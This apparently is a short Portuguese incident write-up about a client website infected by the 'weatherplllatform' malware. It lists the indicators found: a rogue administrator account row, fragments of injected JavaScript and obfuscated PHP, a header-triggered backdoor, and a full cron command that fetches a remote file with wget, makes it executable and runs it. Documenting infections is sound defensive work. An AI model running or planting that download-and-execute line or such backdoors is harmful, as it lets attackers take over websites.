Um dos nossos clientes foi afetado pelo malware weatherplllatform, neste caso scripts.weatherplllatform e descobrimos o seguinte:

Utilizador malicioso com privilégios administrativos

itsme','$P$BqPKFgMTAdxmIvuLuC8iBtt2okVOLY/','itsme','[email protected]','','2020-04-21 06:42:46','',0,'itsme

Ficheiros javascript com código injetado

eval(String.fromCharCode(118,97,….,32,125/spectrepoint/));

Ficheiros PHP com código malicioso injetado

?php $PDvCBkdAp='y(3;]whcx)8$4mb dk1qog5sprlua

Cronjobs com execução xxxd

wget -q -O xxxd http://hello.hellodolly777.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/…/public_html 24 && rm -f xxxd

Ficheiros espalhados por vários locais com acesso por

if (isset($_HEADERS['Authorization']))

Leave a Reply

Your email address will not be published. Required fields are marked *